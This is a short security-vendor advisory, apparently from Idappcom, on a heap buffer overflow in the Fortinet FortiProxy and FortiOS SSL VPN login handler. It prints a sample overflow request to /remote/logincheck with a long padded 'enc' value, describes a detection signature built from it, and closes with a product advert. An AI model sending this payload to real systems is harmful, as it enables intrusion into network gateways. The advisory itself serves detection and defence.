FortiProxy is a web gateway used to provide multiple detection techniques against internet based attacks.
FortiOS is an operating system utilised to deploy and enforce security policies, and enable centralized management across the entire distributed network.
Fortinet FortiProxy and FortiOS are vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the SSL VPN function.
By sending specially crafted requests, a remote attacker could overflow a buffer and execute arbitrary code on the system.
POST /remote/logincheck HTTP/1.1
PAYLOAD - ajax=1&username=test&realm=&credential=&enc=000000247255fc38aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
By turning this into a traffic file and matching rule, we are able to detect unauthenticated attempts to overflow a buffer and execute arbitrary code on the system.
Idappcom has created signature 8023945 along with a corresponding traffic file.
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional